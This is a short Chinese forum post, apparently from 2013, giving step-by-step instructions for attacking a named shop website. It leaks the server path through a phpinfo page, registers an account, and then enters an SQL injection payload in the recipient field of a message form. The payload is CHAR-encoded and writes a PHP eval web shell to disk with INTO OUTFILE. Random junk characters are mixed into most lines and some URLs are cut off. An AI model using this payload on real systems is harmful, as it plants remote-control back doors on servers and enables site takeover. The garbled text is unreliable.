第一个:想办法找到目标网站的绝对路径6 Q/ }7 o1 g2 `) L, H; ^
/ h, g8 V u% w. w, o0 whttp://www.political-security.com/install/svinfo.php?phpinfo=true
5 @& `: `7 o) M. d: g& g3 s3 ?* a+ f/ e. G2 _- e
http:/www.political-security.com/core/api/shop_api.php
6 x1 |: w) X. Z# E- Z
! e, c9 ^* P& v' X& w2 Q. ]http://www.political-security.co ... api_b2b_2_0_cat.php
Y8 t. H5 b% G3 d
7 h& d7 D2 K( m4 i/ Z' phttp://www.political-security.com/core/ap ... b_2_0_goodstype.php
9 G W' Z1 W7 O+ x' P) O6 w- e5 u9 v3 L; ~
http://www.political-security.co ... i_b2b_2_0_brand.php9 c0 Q' g% H+ q2 L7 d6 }
第二个:注册一个普通用户
' Y& w; o$ q/ [$ Y3 u
m$ S7 N$ H8 h; [! B7 n9 m! Lhttp://www.political-security.com/?passport-signup.html
' l5 Z* O: e$ B6 N+ F: K) s" z0 S2 A( I( Z% U# l
第三个: 发送消息
" R5 |! E v8 M2 @: X
# w3 `/ G# \$ | bhttp://www.political-security.com/?member-send.html
. N; Y; _$ A/ _3 \6 Y, ~9 l$ V发送给中填写
$ H. B. F# b8 q" t+ i* F7 F9 Bantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |
发表于 2013-2-27 21:28:28
收藏
支持
反对